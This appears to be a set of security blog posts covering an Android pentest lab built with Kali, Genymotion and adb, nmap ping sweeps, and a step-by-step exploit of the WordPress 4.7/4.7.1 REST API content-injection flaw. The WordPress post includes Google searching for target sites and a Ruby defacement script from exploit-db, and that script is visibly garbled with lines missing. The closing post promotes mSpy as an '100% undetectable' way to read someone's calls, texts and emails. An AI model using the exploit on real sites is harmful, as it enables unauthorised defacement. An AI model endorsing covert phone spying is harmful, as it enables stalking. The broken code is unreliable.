Android Mobile App Security Testing – Part 1

I am currently performing security testing of Android Mobile Apps. I am documenting the whole process, tools and configuration steps necessary for security testing, so this may help someone who starts fresh. 

Step 1: Download Oracle VirtualBox


Step 2: Download and Install Kali Linux


Step 3: Download Genymotion Personal Use and Google Nexus Simulator

You need to register and login with an email address to use Genymotion.


In the Genymotion console, download Google Nexus 6 Android API 5.1. Before starting Google Nexus simulator, click on the 3 dots (…) and choose Edit.

Install and Configure Genymotion Simulator


In the Network mode, choose the same network that Kali Linux is connected. Because in the later stage, we use ADB tool to connect to Android simulator from Kali Linux. This is possible only if both are connected to same network. 

Genymotion Bridge mode


Step 4: Install ADB and Start Google Nexus

Android Debug Bridge (adb) is a versatile command-line tool that lets you communicate with a device (in our case, Google Nexus). The adb command facilitates a variety of device actions, such as installing and debugging apps.

In Kali Linux, execute following command to install ADB.

# apt-get install adb

At this stage, you also start Google Nexus simulator by clicking Start on 3 dots (…) in Genymotion.

Install and Configure Genymotion Simulator

You need to find the IP address of your Android device, in Google Nexus 6, navigate to Settings on the phone and find Wi-Fi IP Address. 

IP Address of Genymotion Android


Step 5: Connect to Android Google Nexus

In the Kali Linux, issue following command to connect to the device by its IP address.. You need to change IP address matching your’s.

# adb connect

If ADB server process is not already running, it starts server and binds to local port TCP 5037. The server then sets up connection to device on scanning random port 5555 to 5585.

Issue following command to confirm that your host computer is connected to the target device:

# adb devices

genymotion ADB Connect

You’re now good to go!

If the adb connection is ever problem, make sure that your Kali Linux and Genymotion arel connected to the same Wi-Fi network.

Issue following command if in case you want to reset your adb host:

adb kill-server

Then start over from the beginning of Step 5.

See you in Part 2 of this article.

PenTest Tool: Ping Sweep

Ping Sweep is similar to Ping but the difference is the number of IP addresses that can be scanned with these tools. Ping Sweep is used to scan a network or large number of IP addresses to find out how many hosts are Live, where as, Ping is used to scan a single host or IP address.

Ping Sweep and Ping, both, sends out ICMP echo request to host and wait for ICMP echo reply to determine the host status.

Ping Sweep Tools:

nmap command:

-sP option does only Ping scan to determine Live status of host.

c:\Tools\nmap-7.70>nmap.exe -sP
Starting Nmap 7.70 ( ) at 2018-12-01 11:41 Arab Standard Time
Nmap scan report for
Host is up (0.012s latency).
MAC Address: 4C:1F:CC:2B:04:C0 (Huawei Technologies)
Nmap scan report for
Host is up (0.033s latency).
MAC Address: 54:60:09:0D:2E:6E (Google)
Nmap scan report for
Host is up (0.043s latency).
MAC Address: 9A:FC:11:B6:6C:BA (Unknown)
Nmap scan report for
Host is up (0.081s latency).
MAC Address: C0:9F:05:65:13:99 (Guangdong Oppo Mobile Telecommunications)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 12.03 seconds


In networks, where ICMP is blocked at the firewall, you certainly cannot use above command to determine the host status. Instead, use TCP sync command to determine host status.

c:\Tools\nmap-7.70>nmap -sS -p80
Starting Nmap 7.70 ( ) at 2018-12-01 12:07 Arab Standard Time
Nmap scan report for
Host is up (0.0048s latency).

80/tcp open http
MAC Address: 4C:1F:CC:2B:04:C0 (Huawei Technologies)

Nmap done: 1 IP address (1 host up) scanned in 4.45 seconds

GUI Tools: 

There are plenty of GUI tools that does similar job, one among them is ping sweep | 

The tool calls Nmap with the proper parameters in order to do the sweeping. Behind the scene, Nmap sends multiple probes to the target systems to provoque responses which could suggest the hosts’ liveness:

  • ICMP echo requests
  • TCP SYN on ports 80,443
  • ICMP timestamp requests

WordPress REST API Exploit Step by Step

Vulnerability                     Unauthenticated Page/Post Content Modification via REST API
Vulnerable WP Versions : 4.7 and 4.7.1
Vulnerability Description: If the website is not patched, the vulnerability could allow a malicious attacker to modify the content of his post or page on a WP site.

Patched Version              : 4.7.2

Additional Info                     : REST API was added in WP 4.4 released on Dec 2015, however you need plugins to activate API. Later in WP 4.7 version, no plugins are needed, it comes enabled by default. This vulnerability is specific to REST API, hence 4.7.0 and 4.7.1 are directly affected by this vulnerability as API is enabled by default.


In this demonstration, we are showing you the exact steps to exploit WordPress websites running vulnerable version 4.7 and 4.7.1. And the tool that I am using here is Advanced Rest Client Chrome add-on.


STEP 1: Find OUT Website Running Wordpress

Google is your door, search for something similar to this and I got on hands plenty of WP websites.

However, we are not going to try on any of those websites, of course I do not want to trouble someone or get into trouble as well. I am going to demonstrate on my local WordPress for you. And this is the page that we are going to change content without any authorization.



View page source of the website to identify the running WP Version. If the version is either 4.7 or 4.7.1, then the website is vulnerable and you can proceed further.


STEP 3: Identify WP Post ID

Each post in WP is associated with a unique post ID, which is its reference. You need to find out using REST API Client. Here 3 is the post ID of the page shown in STEP 1.


STEP 4: Execute Now

You should mention your post ID in the api link. here I mentioned my Post ID 3 as ?id=3ABC

And we got the website hacked!


Alternately  you can use following exploit Code 

require ‘rest-client’
require ‘json’
puts “Enter Target URI (With wp directory)”
targeturi = gets.chomp
puts “Enter Post ID”
postid = gets.chomp.to_i
response =
“id” => “#{postid}justrawdata”,
“title” => “You have been hacked”,
“content” => “Hacked please update your wordpress version”
:content_type => :json,
:accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts “Done! ‘#{targeturi}/index.php?p=#{postid}'”
puts “This site is not Vulnerable”

source: exploit-db

Track your lost Android mobile phone – XtraSEC free android security

I found today a fantastic software to track your lost phone, that too for free!. There is commercial version but still you can perform most of the tasks in free version, XtraSEC

WhiteBox Premium App Site Template

Step 1: Use Login button in XtraSEC website to register your Gmail account.

Step 2: Install XtraSEC app on your android phone

Step 3: Login to your app with the registered gmail account, provide your alternate mobile phone number and allow necessary permissions. (Alternate mobile phone number is necessary to send commands to your lost phone via SMS)

Step 4: You need to create a PIN so that no one can change settings of this app if your phone is stolen.

I was amazed to read all their features provided by XtraSEC

  • Get you phone location and displayed in Google Maps.
  • Remotely capture photo from your phone camera.You can choose either use front or back camera. Captured camera will be sent to registered your email address.
  • Remotely turn off/on WIFI, 3G
  • Remotely wipe phone and memory card data
  • Phone capture

SMS Commands List

mSpy – track mobile phone calls, text messages and many more

mSpy – you can remotely track all activity that takes place on the monitored phone, from calls to calendar updates. Call history, text messages, emails, call recordings… all immediately sent from the tracked phone right to your secure online account! mSpy claims that they are 100% undetectable. Read more

You can look at the compatible phone models – Android, iOS and Blackberry